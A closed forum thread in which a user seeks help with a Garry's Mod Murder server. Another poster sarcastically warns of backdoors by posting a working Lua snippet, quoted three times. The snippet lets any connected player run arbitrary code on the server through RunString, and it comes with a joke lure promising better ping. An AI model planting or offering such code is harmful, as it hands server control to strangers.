Solvedmaking a GMod server

Posts 19 of 9 · Page 1 of 1
making a GMod server
im hiring someone to help me with my Garry's Mod Murder server.
im stuck with the points shop and stuff like that.
so if any1 is interested contact me here or on skype.

Skype: LarsniPlayz
here to shitpost on a shitpost
Quote Originally Posted by meme420 View Post
here to shitpost on a shitpost
wtf are u even doing here if u dont like the post?

- - - Updated - - -

Quote Originally Posted by Cyaegha View Post
Do you want a backdoor? Cos this is how you get a backdoor.
even tho im good at figuring shit out im still not god enough for everything that has with gmod to do
Do you want a backdoor? Cos this is how you get a backdoor.
Code:
if SERVER then
	util.AddNetworkString("not_a_backdoor");
	
	net.Receive("not_a_backdoor", function(len, ply)
		local codes = net.ReadString();
		local _debug, _error = pcall(RunString, codes);
		
		if !(_debug) then
			net.Start("not_a_backdoor");
				net.WriteString(_error);
			net.Send(ply);
		end
	end);
elseif CLIENT then
	net.Receive("not_a_backdoor", function()
		local _error = net.ReadString();
		ErrorNoHalt(_error);
	end);
end
Put this in lua/autorun/not_backdoor.lua and your server will have 0 ping and 70+ players!
Quote Originally Posted by Cyaegha View Post
Code:
if SERVER then
	util.AddNetworkString("not_a_backdoor");
	
	net.Receive("not_a_backdoor", function(len, ply)
		local codes = net.ReadString();
		local _debug, _error = pcall(RunString, codes);
		
		if !(_debug) then
			net.Start("not_a_backdoor");
				net.WriteString(_error);
			net.Send(ply);
		end
	end);
elseif CLIENT then
	net.Receive("not_a_backdoor", function()
		local _error = net.ReadString();
		ErrorNoHalt(_error);
	end);
end
Put this in lua/autorun/not_backdoor.lua and your server will have 0 ping and 70+ players!
even if im stupid theres no way in hell ill get that stupid...

- - - Updated - - -

Quote Originally Posted by Cyaegha View Post
Code:
if SERVER then
	util.AddNetworkString("not_a_backdoor");
	
	net.Receive("not_a_backdoor", function(len, ply)
		local codes = net.ReadString();
		local _debug, _error = pcall(RunString, codes);
		
		if !(_debug) then
			net.Start("not_a_backdoor");
				net.WriteString(_error);
			net.Send(ply);
		end
	end);
elseif CLIENT then
	net.Receive("not_a_backdoor", function()
		local _error = net.ReadString();
		ErrorNoHalt(_error);
	end);
end
Put this in lua/autorun/not_backdoor.lua and your server will have 0 ping and 70+ players!
but even tho im not here for a backdoor im here for a frontdoor
Frontdoors are no longer available.
Quote Originally Posted by BlxxdyyKate View Post
Frontdoors are no longer available.
ok then i guess i have no choice but to make one
Posts 19 of 9 · Page 1 of 1
This thread is closed for replies.

Similar Threads

Tags for this Thread

None

Need help?